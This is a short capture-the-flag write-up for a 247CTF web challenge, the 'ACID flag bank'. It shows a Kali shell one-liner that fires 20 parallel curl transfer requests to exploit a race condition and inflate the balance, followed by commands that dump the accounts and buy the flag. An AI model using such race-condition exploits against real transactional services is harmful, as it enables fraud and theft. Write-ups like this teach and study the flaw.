You can purchase a flag directly from the ACID flag bank, however there aren’t enough funds in the entire bank to complete that transaction! Can you identify any vulnerabilities within the ACID flag bank which enable you to increase the total available funds?
First blood!
https://gist.github.com/CMCDragonkai/5914e02df62137e47f32
ACID stands for Atomicity, Consistency, Isolation and Durability, principles that application must adhere to avoid vulnerabilities.
kali@kali:~$ seq 20 | parallel -n0 -j20 "curl https://4f4978dd2809c112.247ctf.com/?to=2\&from=1\&amount=50"
kali@kali:~$ curl https://4f4978dd2809c112.247ctf.com/?dump
<pre>ID FUNDS
1 47
2 250
</pre>
kali@kali:~$ curl https://4f4978dd2809c112.247ctf.com/?flag\&from=2
247CTF{xxx}